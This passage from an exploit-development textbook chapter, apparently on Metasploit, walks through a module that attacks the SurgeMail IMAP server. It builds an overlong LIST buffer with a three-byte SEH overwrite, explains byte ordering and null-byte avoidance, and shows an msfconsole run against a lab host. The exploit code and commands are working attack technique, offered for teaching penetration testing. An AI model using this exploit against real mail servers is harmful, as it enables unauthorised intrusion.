Creating Your Own Exploits
207
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' =>
"\x7e\x51\x78"
} ], # p/p/r in surgemail.exe
],
'DisclosureDate' => 'March 13 2008',
'DefaultTarget' => 0))
end
def exploit
connected = connect_login
lead = "\x41" * 10360
evil = lead +
[target.ret].pack("A3")
print_status("Sending payload")
sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
To perform a three-byte overwrite of the SEH, we set the three bytes to be
added to the buffer in the
'Targets'
block at , in little-endian order, as shown
in boldface type in the listing. (Endian-ness is determined by the target CPU’s
architecture, and Intel-compatible processors use little-endian byte ordering.)
At we replace the three
C
s in the
evil
string with
[target.ret].pack("A3")
,
which will send the return address exactly as it is declared in the
'Targets'
block. When modifying many exploits that use a three-byte overwrite, you can
declare the target address literally (
0x0078517e
in this case) and Metasploit
will automatically order the bytes correctly when you use
[target.ret].pack('V')
.
This scenario requires more granular control, because if we were to send the
null (00) byte, it would represent the end of a string and could prevent the
exploit from functioning properly.
Now is a good time to run the exploit to make sure that it works prop-
erly. If you jump too far ahead when developing an exploit, you run the risk
of making an error somewhere and having to do a lot of backtracking to find
out what went wrong. Here’s the exploit:
msf >
use exploit/windows/imap/surgemail_book
msf exploit(surgemail_book) >
set IMAPPASS test
IMAPPASS => test
msf exploit(surgemail_book) >
set IMAPUSER test
IMAPUSER => test
msf exploit(surgemail_book) >
set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(surgemail_book) >
set PAYLOAD generic/debug_trap
PAYLOAD => generic/debug_trap
msf exploit(surgemail_book) >
exploit
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >